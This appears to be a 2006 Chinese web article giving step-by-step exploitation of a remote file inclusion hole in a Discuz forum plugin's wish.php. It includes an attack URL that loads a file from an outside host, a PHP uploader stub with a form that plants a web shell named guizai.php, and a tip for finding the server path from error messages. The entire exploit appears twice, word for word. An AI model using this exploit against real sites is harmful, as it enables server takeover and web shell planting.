discuz許愿池插件遠(yuǎn)程包含漏洞
更新時(shí)間:2006年11月06日 00:00:00 作者:
許愿池插件的wish.php文件出的問(wèn)題:
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
遠(yuǎn)程包含漏洞,變量discuz_root過(guò)濾不嚴(yán),利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后綴,可以改為任意后綴,后面一定要記得加問(wèn)號(hào)。
這里xxxx.txt用CN.Tink的那個(gè)小馬寫(xiě)個(gè)shell進(jìn)去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
網(wǎng)站物理路徑可以通過(guò)提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看錯(cuò)誤提示信息,然后修改xxxx.txt中的路徑即可。 guizai.php就是你上傳的shell的名字。
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
遠(yuǎn)程包含漏洞,變量discuz_root過(guò)濾不嚴(yán),利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后綴,可以改為任意后綴,后面一定要記得加問(wèn)號(hào)。
這里xxxx.txt用CN.Tink的那個(gè)小馬寫(xiě)個(gè)shell進(jìn)去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
網(wǎng)站物理路徑可以通過(guò)提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看錯(cuò)誤提示信息,然后修改xxxx.txt中的路徑即可。 guizai.php就是你上傳的shell的名字。
相關(guān)文章
跨站式腳本(Cross-SiteScripting)XSS攻擊原理分析
XSS又叫CSS (Cross Site Script) ,跨站腳本攻擊。它指的是惡意攻擊者往Web頁(yè)面里插入惡意html代碼,當(dāng)用戶瀏覽該頁(yè)之時(shí),嵌入其中Web里面的html代碼會(huì)被執(zhí)行,從而達(dá)到惡意用戶的特殊目的。2008-09-09